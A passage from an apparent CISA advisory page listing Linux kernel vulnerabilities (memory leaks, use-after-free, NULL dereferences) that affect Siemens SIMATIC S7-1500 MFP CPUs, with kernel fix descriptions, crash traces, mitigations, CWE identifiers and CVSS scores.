<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22979</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: fix memory leak in skb_segment_list for GRO packets When skb_segment_list() is called during packet forwarding, it handles packets that were aggregated by the GRO engine. Historically, the segmentation logic in skb_segment_list assumes that individual segments are split from a parent SKB and may need to carry their own socket memory accounting. Accordingly, the code transfers truesize from the parent to the newly created segments. Prior to commit ed4cccef64c1 ("gro: fix ownership transfer"), this truesize subtraction in skb_segment_list() was valid because fragments still carry a reference to the original socket. However, commit ed4cccef64c1 ("gro: fix ownership transfer") changed this behavior by ensuring that fraglist entries are explicitly orphaned (skb-&gt;sk = NULL) to prevent illegal orphaning later in the stack. This change meant that the entire socket memory charge remained with the head SKB, but the corresponding accounting logic in skb_segment_list() was never updated. As a result, the current code unconditionally adds each fragment's truesize to delta_truesize and subtracts it from the parent SKB. Since the fragments are no longer charged to the socket, this subtraction results in an effective under-count of memory when the head is freed. This causes sk_wmem_alloc to remain non-zero, preventing socket destruction and leading to a persistent memory leak. The leak can be observed via KMEMLEAK when tearing down the networking environment: unreferenced object 0xffff8881e6eb9100 (size 2048): comm "ping", pid 6720, jiffies 4295492526 backtrace: kmem_cache_alloc_noprof+0x5c6/0x800 sk_prot_alloc+0x5b/0x220 sk_alloc+0x35/0xa00 inet6_create.part.0+0x303/0x10d0 __sock_create+0x248/0x640 __sys_socket+0x11b/0x1d0 Since skb_segment_list() is exclusively used for SKB_GSO_FRAGLIST packets constructed by GRO, the truesize adjustment is removed. The call to skb_release_head_state() must be preserved. As documented in commit cf673ed0e057 ("net: fix fraglist segmentation reference count leak"), it is still required to correctly drop references to SKB extensions that may be overwritten during __copy_skb_header().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22979">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22980</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nfsd: provide locking for v4_end_grace Writing to v4_end_grace can race with server shutdown and result in memory being accessed after it was freed - reclaim_str_hashtbl in particularly. We cannot hold nfsd_mutex across the nfsd4_end_grace() call as that is held while client_tracking_op-&gt;init() is called and that can wait for an upcall to nfsdcltrack which can write to v4_end_grace, resulting in a deadlock. nfsd4_end_grace() is also called by the landromat work queue and this doesn't require locking as server shutdown will stop the work and wait for it before freeing anything that nfsd4_end_grace() might access. However, we must be sure that writing to v4_end_grace doesn't restart the work item after shutdown has already waited for it. For this we add a new flag protected with nn-&gt;client_lock. It is set only while it is safe to make client tracking calls, and v4_end_grace only schedules work while the flag is set with the spinlock held. So this patch adds a nfsd_net field "client_tracking_active" which is set as described. Another field "grace_end_forced", is set when v4_end_grace is written. After this is set, and providing client_tracking_active is set, the laundromat is scheduled. This "grace_end_forced" field bypasses other checks for whether the grace period has finished. This resolves a race which can result in use-after-free.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22980">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22982</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: mscc: ocelot: Fix crash when adding interface under a lag Commit 15faa1f67ab4 ("lan966x: Fix crash when adding interface under a lag") fixed a similar issue in the lan966x driver caused by a NULL pointer dereference. The ocelot_set_aggr_pgids() function in the ocelot driver has similar logic and is susceptible to the same crash. This issue specifically affects the ocelot_vsc7514.c frontend, which leaves unused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as it uses the DSA framework which registers all ports. Fix this by checking if the port pointer is valid before accessing it.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22982">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22992</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: libceph: return the handler error from mon_handle_auth_done() Currently any error from ceph_auth_handle_reply_done() is propagated via finish_auth() but isn't returned from mon_handle_auth_done(). This results in higher layers learning that (despite the monitor considering us to be successfully authenticated) something went wrong in the authentication phase and reacting accordingly, but msgr2 still trying to proceed with establishing the session in the background. In the case of secure mode this can trigger a WARN in setup_crypto() and later lead to a NULL pointer dereference inside of prepare_auth_signature().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22992">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/252.html">CWE-252 Unchecked Return Value</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22994</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix reference count leak in bpf_prog_test_run_xdp() syzbot is reporting unregister_netdevice: waiting for sit0 to become free. Usage count = 2 problem. A debug printk() patch found that a refcount is obtained at xdp_convert_md_to_buff() from bpf_prog_test_run_xdp(). According to commit ec94670fcb3b ("bpf: Support specifying ingress via xdp_md context in BPF_PROG_TEST_RUN"), the refcount obtained by xdp_convert_md_to_buff() will be released by xdp_convert_buff_to_md(). Therefore, we can consider that the error handling path introduced by commit 1c1949982524 ("bpf: introduce frags support to bpf_prog_test_run_xdp()") forgot to call xdp_convert_buff_to_md().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22994">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23003</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: use skb_vlan_inet_prepare() in __ip6_tnl_rcv() Blamed commit did not take care of VLAN encapsulations as spotted by syzbot [1]. Use skb_vlan_inet_prepare() instead of pskb_inet_may_pull(). [1] BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321 __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321 ip6ip6_dscp_ecn_decapsulate+0x16f/0x1b0 net/ipv6/ip6_tunnel.c:729 __ip6_tnl_rcv+0xed9/0x1b50 net/ipv6/ip6_tunnel.c:860 ip6_tnl_rcv+0xc3/0x100 net/ipv6/ip6_tunnel.c:903 gre_rcv+0x1529/0x1b90 net/ipv6/ip6_gre.c:-1 ip6_protocol_deliver_rcu+0x1c89/0x2c60 net/ipv6/ip6_input.c:438 ip6_input_finish+0x1f4/0x4a0 net/ipv6/ip6_input.c:489 NF_HOOK include/linux/netfilter.h:318 [inline] ip6_input+0x9c/0x330 net/ipv6/ip6_input.c:500 ip6_mc_input+0x7ca/0xc10 net/ipv6/ip6_input.c:590 dst_input include/net/dst.h:474 [inline] ip6_rcv_finish+0x958/0x990 net/ipv6/ip6_input.c:79 NF_HOOK include/linux/netfilter.h:318 [inline] ipv6_rcv+0xf1/0x3c0 net/ipv6/ip6_input.c:311 __netif_receive_skb_one_core net/core/dev.c:6139 [inline] __netif_receive_skb+0x1df/0xac0 net/core/dev.c:6252 netif_receive_skb_internal net/core/dev.c:6338 [inline] netif_receive_skb+0x57/0x630 net/core/dev.c:6397 tun_rx_batched+0x1df/0x980 drivers/net/tun.c:1485 tun_get_user+0x5c0e/0x6c60 drivers/net/tun.c:1953 tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0xbe2/0x15d0 fs/read_write.c:686 ksys_write fs/read_write.c:738 [inline] __do_sys_write fs/read_write.c:749 [inline] __se_sys_write fs/read_write.c:746 [inline] __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746 x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:4960 [inline] slab_alloc_node mm/slub.c:5263 [inline] kmem_cache_alloc_node_noprof+0x9e7/0x17a0 mm/slub.c:5315 kmalloc_reserve+0x13c/0x4b0 net/core/skbuff.c:586 __alloc_skb+0x805/0x1040 net/core/skbuff.c:690 alloc_skb include/linux/skbuff.h:1383 [inline] alloc_skb_with_frags+0xc5/0xa60 net/core/skbuff.c:6712 sock_alloc_send_pskb+0xacc/0xc60 net/core/sock.c:2995 tun_alloc_skb drivers/net/tun.c:1461 [inline] tun_get_user+0x1142/0x6c60 drivers/net/tun.c:1794 tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0xbe2/0x15d0 fs/read_write.c:686 ksys_write fs/read_write.c:738 [inline] __do_sys_write fs/read_write.c:749 [inline] __se_sys_write fs/read_write.c:746 [inline] __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746 x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f CPU: 0 UID: 0 PID: 6465 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(none) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23003">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/457.html">CWE-457 Use of Uninitialized Variable</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23005</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1 When loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in response to a guest WRMSR, clear XFD-disabled features in the saved (or to be restored) XSTATE_BV to ensure KVM doesn't attempt to load state for features that are disabled via the guest's XFD. Because the kernel executes XRSTOR with the guest's XFD, saving XSTATE_BV[i]=1 with XFD[i]=1 will cause XRSTOR to #NM and panic the kernel. E.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV: ------------[ cut here ]------------ WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848 Modules linked in: kvm_intel kvm irqbypass CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:exc_device_not_available+0x101/0x110 Call Trace: asm_exc_device_not_available+0x1a/0x20 RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90 switch_fpu_return+0x4a/0xb0 kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm] kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x62/0x940 entry_SYSCALL_64_after_hwframe+0x4b/0x53 ---[ end trace 0000000000000000 ]--- This can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1, and a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler's call to fpu_update_guest_xfd(). and if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE: ------------[ cut here ]------------ WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867 Modules linked in: kvm_intel kvm irqbypass CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:exc_device_not_available+0x101/0x110 Call Trace: asm_exc_device_not_available+0x1a/0x20 RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90 fpu_swap_kvm_fpstate+0x6b/0x120 kvm_load_guest_fpu+0x30/0x80 [kvm] kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm] kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x62/0x940 entry_SYSCALL_64_after_hwframe+0x4b/0x53 ---[ end trace 0000000000000000 ]--- The new behavior is consistent with the AMX architecture. Per Intel's SDM, XSAVE saves XSTATE_BV as '0' for components that are disabled via XFD (and non-compacted XSAVE saves the initial configuration of the state component): If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i, the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1; instead, it operates as if XINUSE[i] = 0 (and the state component was in its initial state): it saves bit i of XSTATE_BV field of the XSAVE header as 0; in addition, XSAVE saves the initial configuration of the state component (the other instructions do not save state component i). Alternatively, KVM could always do XRSTOR with XFD=0, e.g. by using a constant XFD based on the set of enabled features when XSAVEing for a struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled features can only happen in the above interrupt case, or in similar scenarios involving preemption on preemptible kernels, because fpu_swap_kvm_fpstate()'s call to save_fpregs_to_fpstate() saves the outgoing FPU state with the current XFD; and that is (on all but the first WRMSR to XFD) the guest XFD. Therefore, XFD can only go out of sync with XSTATE_BV in the above interrupt case, or in similar scenarios involving preemption on preemptible kernels, and it we can consider it (de facto) part of KVM ABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features. [Move clea ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23005">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23010</a></h3>
<div class="csaf-accordion-content">
